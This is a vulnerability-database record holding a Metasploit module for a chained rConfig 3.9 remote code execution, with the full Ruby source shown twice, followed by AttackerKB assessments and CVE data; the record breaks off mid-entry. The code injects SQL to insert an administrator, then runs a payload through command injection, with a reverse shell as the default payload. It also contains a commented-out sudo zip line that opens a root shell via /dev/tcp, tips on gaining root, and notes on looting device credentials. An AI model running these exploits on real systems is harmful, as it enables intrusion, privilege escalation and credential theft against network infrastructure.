ID MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE Type metasploit Reporter Rapid7 Modified 2020-03-13T09:42:40
Description
This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the path parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQL injection. This module has been successfully tested on rConfig 3.9.3 and 3.9.4. The steps are: 1. SQL injection on /commands.inc.php allows us to add an administrative user. 2. An authenticated session is established with the newly added user. 3. Command injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4. Remove the added admin user. Tip: once you get a shell, look at CVE-2019-19585. You will probably get root because the rConfig install script adds the Apache user to sudoers with NOPASSWD ;-)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
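# Chained rConfig 3.9.x exploit module.
#
# Flow (one HTTP request per step, all driven by the HttpClient mixin):
#   0. #check     - fingerprint rConfig from the login page footer
#   1. #create_rconfig_user - insert a temporary administrator through the
#      unauthenticated SQL injection in commands.inc.php (CVE-2020-10220)
#   2. #login     - obtain a session cookie and authenticate as that user
#   3. #trigger_rce - run the payload through the command injection in the
#      `path` parameter of lib/ajaxHandlers/ajaxArchiveFiles.php (CVE-2019-19509)
#   4. #cleanup   - delete the temporary administrator again
#
# Instance state is limited to the session cookie (@cookie) and the temporary
# account credentials (@username / @password) shared between the steps.
#
# Defender note: every step leaves an HTTP request in the web server log;
# SQL keywords in the searchColumn parameter of commands.inc.php and backticks
# in the path parameter of ajaxArchiveFiles.php are the visible indicators.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Rconfig 3.x Chained Remote Code Execution',
        'Description' => '
        This module exploits multiple vulnerabilities in rConfig version 3.9
        in order to execute arbitrary commands.
        This module takes advantage of a command injection vulnerability in the
        `path` parameter of the ajax archive file functionality within the rConfig web
        interface in order to execute the payload.
        Valid credentials for a user with administrative privileges are required.
        However, this module can bypass authentication via SQLI.
        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
        The steps are:
        1. SQLi on /commands.inc.php allows us to add an administrative user.
        2. An authenticated session is established with the newly added user
        3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
        execute the payload.
        4. Remove the added admin user.
        Tips : once you get a shell, look at the CVE-2019-19585.
        You will probably get root because rConfig install script add Apache user to
        sudoers with nopasswd ;-)
        ',
        'License' => MSF_LICENSE,
        'Author' => [
          'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module
          'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)
        ],
        'References' => [
          ['CVE', '2019-19509'], # authenticated rce
          ['CVE', '2020-10220'], # sqli auth bypass
          %w[EDB 47982],
          %w[EDB 48208],
          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi
        ],
        'Platform' => %w[unix linux],
        'Arch' => ARCH_CMD,
        'Targets' => [['Auto', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2020-03-11',
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects
          'PAYLOAD' => 'generic/shell_reverse_tcp'
        },
        # A database row is inserted (and removed again on cleanup) and every
        # step is an HTTP request that the web server logs.
        'Notes' => {
          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'DefaultTarget' => 0
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])
      ]
    )
  end

  # Fingerprint rConfig from the version string in the login page footer.
  #
  # @return [Exploit::CheckCode] Appears for a "rConfig Version 3.9" footer,
  #   Detected for any other footer mentioning rConfig, Safe when the footer
  #   is missing or mentions no rConfig, Unknown when the login page could not
  #   be fetched or parsed.
  def check
    vprint_status 'STEP 0: Get rConfig version...'
    res = send_request_cgi!(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.php')
    )
    html = res&.get_html_document
    unless html
      vprint_error 'Could not check rConfig version'
      return Exploit::CheckCode::Unknown
    end

    # A missing footer element used to raise NoMethodError here instead of
    # producing a verdict; treat it as "not rConfig".
    footer = html.at('div[@id="footer-copyright"]')&.text || ''
    if footer.include? 'rConfig Version 3.9'
      print_good('rConfig version 3.9 detected')
      Exploit::CheckCode::Appears
    elsif footer.include? 'rConfig'
      print_status('rConfig detected, but not version 3.9')
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Query parameters for commands.inc.php that carry +statement+ in the
  # injectable searchColumn field. The other three values are the fixed ones
  # from the original proof of concept.
  #
  # @param statement [String] injected SQL fragment
  # @return [Hash{String => String}] vars_get hash for send_request_cgi
  def sqli_params(statement)
    {
      'search' => 'search',
      'searchOption' => 'contains',
      'searchField' => 'vuln',
      'searchColumn' => statement
    }
  end

  # Insert a temporary administrator through the unauthenticated SQL
  # injection in commands.inc.php.
  #
  # The stored password column receives the MD5 of +password+ (rConfig keeps
  # MD5 password hashes), so #login can later use the same clear-text value.
  #
  # @param user [String] username to insert
  # @param password [String] clear-text password for the new account
  # @return [void]
  # @raise [Msf::Exploit::Failed] via fail_with when the target does not answer
  def create_rconfig_user(user, password)
    vprint_status 'STEP 1 : Adding a temporary admin user...'
    # 3-digit numeric id; a collision with an existing row is not handled here.
    fake_id = Rex::Text.rand_text_numeric(3)
    password_md5 = Rex::Text.md5(password)
    # Copied from the original PoC; what rConfig derives from this column is
    # not established here — confirm before changing it.
    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
    userleveladmin = 9 # Administrator
    # The timestamp is a fixed epoch value from the PoC; rConfig does not appear
    # to validate it (assumption — verify if the insert starts failing).
    user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{password_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--"
    sqli_res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
      'method' => 'GET',
      'vars_get' => sqli_params(user_sqli)
    )
    # Without this account the remaining steps cannot work, so stop here
    # instead of carrying on (and #cleanup still runs).
    fail_with Failure::Unreachable, 'Failed to create user: Connection failed.' unless sqli_res
    print_good "New temporary user #{user} created"
  end

  # Obtain a session cookie from the login page and authenticate as +user+.
  # The cookie is kept in @cookie for #trigger_rce.
  #
  # Only transport-level failures are detected; an HTTP 200 from
  # userprocess.php is taken as success without inspecting the body, as in the
  # original proof of concept.
  #
  # @param user [String] username created by #create_rconfig_user
  # @param pass [String] its clear-text password
  # @return [void]
  # @raise [Msf::Exploit::Failed] via fail_with when no cookie or no response
  def login(user, pass)
    vprint_status "STEP 2: Authenticating as #{user} ..."
    # get session cookie (PHPSESSID)
    res = send_request_cgi!(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/login.php')
    )
    fail_with Failure::Unreachable, 'Failed to retrieve login page: Connection failed.' unless res
    @cookie = res.get_cookies
    fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies' if @cookie.empty?

    # authenticate
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
      'cookie' => @cookie,
      'vars_post' => {
        pass: pass,
        user: user,
        sublogin: 1
      }
    )
    fail_with Failure::Unreachable, 'Failed to authenticate: Connection failed.' unless res
    print_good "Authenticated as user #{user}"
  end

  # Run +cmd+ through the command injection in the `path` parameter of
  # ajaxArchiveFiles.php, using the session established by #login.
  #
  # The HTTP response is deliberately not inspected: the PHP handler blocks
  # while the injected command runs, so with a reverse-shell payload the
  # request never completes. Success is only observable through the payload
  # handler, which is why the message below does not claim execution.
  #
  # @param cmd [String] shell command to run on the target
  # @param _opts [Hash] unused, kept for signature compatibility
  # @return [void]
  def trigger_rce(cmd, _opts = {})
    vprint_status "STEP 3: Executing the command (#{cmd})"
    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),
      'cookie' => @cookie,
      'vars_get' => {
        'path' => "`#{cmd} #`",
        'ext' => 'random'
      }
    )
    print_status 'Command sent; check the payload handler for a session'
  end

  # Remove the temporary administrator through the same SQL injection that
  # created it. Best effort only: this runs from #cleanup, so a connection
  # failure is reported with a request to remove the account by hand rather
  # than raised.
  #
  # @param user [String] username inserted by #create_rconfig_user
  # @return [void]
  def delete_rconfig_user(user)
    vprint_status 'STEP 4 : Removing the temporary admin user...'
    del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--"
    del_res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
      'method' => 'GET',
      'vars_get' => sqli_params(del_sqli)
    )
    unless del_res
      print_warning "Removing user #{user} failed: Connection failed. Please remove it manually."
      return
    end
    print_status "User #{user} removed successfully !"
  end

  # Framework hook: remove the temporary account if one was chosen, even when
  # a later step aborted via fail_with.
  def cleanup
    super
    delete_rconfig_user @username if @username
  end

  # Entry point: abort unless the target looks like rConfig, then run the
  # four steps in order. The temporary account is removed by #cleanup.
  def exploit
    code = check
    if code == Exploit::CheckCode::Unknown
      fail_with(Failure::Unknown, 'Could not check rConfig version')
    elsif code == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target does not appear to be rConfig')
    end

    @username = rand_text_alphanumeric(8..12)
    # Random rather than a fixed value: the account exists on the target until
    # #cleanup runs, and a guessable password would make it usable by anyone
    # else in the meantime.
    @password = rand_text_alphanumeric(12)
    create_rconfig_user(@username, @password)
    login(@username, @password)
    # An earlier revision carried a commented-out local root escalation via
    # CVE-2019-19585 here; it was dropped as unreliable (quoting problems).
    trigger_rce(payload.encoded.to_s)
  end
end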
{"id": "MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE", "type": "metasploit", "bulletinFamily": "exploit", "title": "Rconfig 3.x Chained Remote Code Execution", "description": "This module exploits multiple vulnerabilities in rConfig version 3.9 in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `path` parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on Rconfig 3.9.3 and 3.9.4. The steps are: 1\\. SQLi on /commands.inc.php allows us to add an administrative user. 2\\. An authenticated session is established with the newly added user 3\\. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to execute the payload. 4\\. Remove the added admin user. Tips : once you get a shell, look at the CVE-2019-19585. 
You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)\n", "published": "2020-03-12T10:41:12", "modified": "2020-03-13T09:42:40", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19509", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10220", "https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py", "https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py"], "cvelist": ["CVE-2019-19509", "CVE-2019-19585", "CVE-2020-10220"], "lastseen": "2020-10-15T04:00:56", "viewCount": 58, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:85DDC128-1CE2-4590-954A-13425E6BA9D8", "AKB:831EDE69-A5DC-468C-807D-144BA7CDA373", "AKB:7D55EC92-6278-4C2B-AD29-C886202D1217", "AKB:9EB7CEDF-02A1-46F2-A85D-0ED65BFD9B52", "AKB:FB545FC9-A1EB-44C3-8CBC-91FD4811C31A", "AKB:9527F9CE-9A8A-4C09-9224-6EBB1C1CE080"]}, {"type": "cve", "idList": ["CVE-2019-19509", "CVE-2020-10220", "CVE-2019-19585"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156146", "PACKETSTORM:156766", "PACKETSTORM:156950", "PACKETSTORM:156688"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B08CB2D0FD65D2459D536B8624991694", "EXPLOITPACK:D4882FF7F5ED2734A7C626D4055DCEDE", "EXPLOITPACK:70190622C383FFD1E3346CCB252B46A2"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113651", "OPENVAS:1361412562310113649", "OPENVAS:1361412562310113621"]}, {"type": "exploitdb", "idList": ["EDB-ID:48223", "EDB-ID:48208"]}, {"type": "zdt", "idList": ["1337DAY-ID-34087", "1337DAY-ID-34104", "1337DAY-ID-33879"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/RCONFIG_AJAXARCHIVEFILES_RCE/"]}, {"type": "dsquare", "idList": ["E-703"]}], "modified": "2020-10-15T04:00:56", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2020-10-15T04:00:56", "rev": 
2}, "vulnersScore": 8.3}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Rconfig 3.x Chained Remote Code Execution',\n 'Description' => '\n This module exploits multiple vulnerabilities in rConfig version 3.9\n in order to execute arbitrary commands.\n This module takes advantage of a command injection vulnerability in the\n `path` parameter of the ajax archive file functionality within the rConfig web\n interface in order to execute the payload.\n Valid credentials for a user with administrative privileges are required.\n However, this module can bypass authentication via SQLI.\n This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.\n The steps are:\n 1. SQLi on /commands.inc.php allows us to add an administrative user.\n 2. An authenticated session is established with the newly added user\n 3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to\n execute the payload.\n 4. 
Remove the added admin user.\n Tips : once you get a shell, look at the CVE-2019-19585.\n You will probably get root because rConfig install script add Apache user to\n sudoers with nopasswd ;-)\n ',\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module\n 'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)\n ],\n 'References' =>\n [\n ['CVE', '2019-19509'], # authenticated rce\n ['CVE', '2020-10220'], # sqli auth bypass\n %w[EDB 47982],\n %w[EDB 48208],\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE\n ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi\n ],\n 'Platform' => %w[unix linux],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Auto', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => '2020-03-11',\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects\n 'PAYLOAD' => 'generic/shell_reverse_tcp'\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])\n ]\n end\n\n # CHECK IF RCONFIG IS REACHABLE AND INSTALLED\n def check\n vprint_status 'STEP 0: Get rConfig version...'\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n if !res || !res.get_html_document\n fail_with(Failure::Unknown, 'Could not check rConfig version')\n end\n if res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9'\n print_good('rConfig version 3.9 detected')\n return Exploit::CheckCode::Appears\n elsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 
'rConfig'\n print_status('rConfig detected, but not version 3.9')\n return Exploit::CheckCode::Detected\n end\n end\n\n # CREATE AN ADMIN USER IN RCONFIG\n def create_rconfig_user(user, _password)\n vprint_status 'STEP 1 : Adding a temporary admin user...'\n fake_id = Rex::Text.rand_text_numeric(3)\n fake_pass = Rex::Text.rand_text_alpha(10)\n fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'\n fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'\n userleveladmin = 9 # Administrator\n user_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\"\n sqli_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => user_sqli\n }\n )\n unless sqli_res\n print_warning('Failed to create user: Connection failed.')\n return\n end\n print_good \"New temporary user #{user} created\"\n end\n\n # AUTHENTICATE ON RCONFIG\n def login(user, pass)\n vprint_status \"STEP 2: Authenticating as #{user} ...\"\n # get session cookie (PHPSESSID)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => '/login.php'\n )\n @cookie = res.get_cookies\n if @cookie.empty?\n fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'\n return\n end\n # authenticate\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),\n 'cookie' => @cookie,\n 'vars_post' => {\n pass: pass,\n user: user,\n sublogin: 1\n }\n )\n unless res\n print_warning('Failed to authenticate: Connection failed.')\n return\n end\n print_good \"Authenticated as user #{user}\"\n end\n\n def trigger_rce(cmd, _opts = {})\n vprint_status \"STEP 3: Executing the command (#{cmd})\"\n trigger 
= \"`#{cmd} #`\"\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),\n 'cookie' => @cookie,\n 'vars_get' => {\n 'path' => trigger,\n 'ext' => 'random'\n }\n )\n # the page hangs because of the command being executed, so we can't expect HTTP response\n # unless res\n # fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'\n # return\n # end\n # unless res.body.include? '\"success\":true'\n # fail_with Failure::Unknown, 'It seems that the code was not executed'\n # return\n # end\n print_good 'Command sucessfully executed'\n end\n\n # DELETE A USER\n def delete_rconfig_user(user)\n vprint_status 'STEP 4 : Removing the temporary admin user...'\n del_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\"\n del_res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'search' => 'search',\n 'searchOption' => 'contains',\n 'searchField' => 'vuln',\n 'searchColumn' => del_sqli\n }\n )\n unless del_res\n print_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\"\n return\n end\n print_status \"User #{user} removed successfully !\"\n end\n\n def cleanup\n super\n delete_rconfig_user @username if @username\n end\n\n def exploit\n check\n @username = rand_text_alphanumeric(8..12)\n @password = 'admin'\n create_res = create_rconfig_user @username, @password\n login(@username, @password)\n tmp_txt_file = Rex::Text.rand_text_alpha(10)\n tmp_zip_file = Rex::Text.rand_text_alpha(10)\n # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). 
Too bad :-(\n # trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\")\n trigger_rce(payload.encoded.to_s)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"attackerkb": [{"lastseen": "2020-11-18T06:42:09", "bulletinFamily": "info", "cvelist": ["CVE-2019-19509", "CVE-2019-19585", "CVE-2020-10220", "CVE-2020-10221"], "description": "An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n\n \n**Recent assessments:** \n \n**theguly** at March 12, 2020 3:39pm UTC reported:\n\ni love these type of vulnerabilities because they chain three findings normally considered low/medium to take over a full infrastructure.\n\nwe have: \n1) a web page that doesn\u2019t check user session ( commands.inc.php doesn\u2019t have the if (!$session->logged_in) check and therefore no auth required upon access ) \n2) a trivial unescaped GET parameter used in a sql query in that page, therefore unauth sql injection \n3) plaintext storage by default, therefore profit\n\nrConfig has access to network devices, and of course credentials (both standard and privileged) are kept in her database. \nwhat makes this attack even more useful, is that by default rConfig doesn\u2019t encrypt data so this sql injection will grant an attacker the plaintext of every juicy information about network infrastructure monitored by this tool: ip, username, password, eventual privileged ones, full configuration.\n\nsince version 3.8.0 it\u2019s possible to encrypt just passwords: <http://help.rconfig.com/settings/mainsettings> \nso point 3) is partially solved. in this case, an attacker will try to read files using sql injection, if user has FILE grants, to decrypt passwords and get loot anyway.\n\nplus, the webapp uses PDO which supports stacked queries. 
the public exploit (<https://www.exploit-db.com/exploits/48261>) abuses this to execute an INSERT statement that adds a new administrator, giving the chance to get RCE by chaining this CVE with CVE-2019-19509 (authenticated RCE) and then LPE to root with CVE-2019-19585.\n\nas a bonus, we could chain this sqli with CVE-2020-10221 to get RCE: even if strong passwords are enforced (classes/usersession.class.php line 338), users\u2019 passwords are hashed with unsalted md5 (the public exploit inserts the bare md5 of 'admin' and the login accepts it), so an offline bruteforce of hashes dumped through the sqli is not trivial but far easier than against a salted, slow, modern password hash.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2020-03-07T00:00:00", "id": "AKB:FB545FC9-A1EB-44C3-8CBC-91FD4811C31A", "href": "https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220", "type": "attackerkb", "title": "CVE-2020-10220", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:45:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-19585"], "description": "An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an \u201crConfig specific Apache configuration\u201d update, apache has high privileges for some binaries. 
This can be exploited by an attacker to bypass local security restrictions.\n\n \n**Recent assessments:** \n \n**theguly** at March 16, 2020 4:47pm UTC reported:\n\nnot a real assessment, just a note: the sudoers entries added by the install script are a mess. Besides zip (whose -TT hook is what the public root exploit runs via sudo), the apache user can get to root through at least three other binaries that have GTFOBins sudo entries.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2019-08-08T00:00:00", "id": "AKB:831EDE69-A5DC-468C-807D-144BA7CDA373", "href": "https://attackerkb.com/topics/D4D30tvQt3/cve-2019-19585", "type": "attackerkb", "title": "CVE-2019-19585", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10549"], "description": "rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:29am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:9527F9CE-9A8A-4C09-9224-6EBB1C1CE080", "href": "https://attackerkb.com/topics/uYlQT9uX2D/cve-2020-10549", "type": "attackerkb", "title": "CVE-2020-10549", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:11", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10548"], "description": "rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. 
Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:28am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:85DDC128-1CE2-4590-954A-13425E6BA9D8", "href": "https://attackerkb.com/topics/1iRTqdeMy3/cve-2020-10548", "type": "attackerkb", "title": "CVE-2020-10548", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10547"], "description": "rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:28am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:7D55EC92-6278-4C2B-AD29-C886202D1217", "href": "https://attackerkb.com/topics/FwSrucCxyn/cve-2020-10547", "type": "attackerkb", "title": "CVE-2020-10547", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:42:14", "bulletinFamily": "info", "cvelist": ["CVE-2020-10220", "CVE-2020-10546"], "description": "rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. 
Because, by default, nodes\u2019 passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.\n\n \n**Recent assessments:** \n \n**theguly** at June 04, 2020 8:27am UTC reported:\n\nsee [cve-2020-10220](<https://attackerkb.com/topics/QtNg2pyrm2/cve-2020-10220>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-06-04T00:00:00", "id": "AKB:9EB7CEDF-02A1-46F2-A85D-0ED65BFD9B52", "href": "https://attackerkb.com/topics/alZARrW6Ty/cve-2020-10546", "type": "attackerkb", "title": "CVE-2020-10546", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T13:38:50", "description": "An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-06T20:15:00", "title": "CVE-2019-19509", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T18:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.3"], "id": "CVE-2019-19509", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19509", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:38:50", "description": "An issue was discovered in rConfig 3.9.3. The install script updates the /etc/sudoers file for rconfig specific tasks. After an \"rConfig specific Apache configuration\" update, apache has high privileges for some binaries. This can be exploited by an attacker to bypass local security restrictions.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": 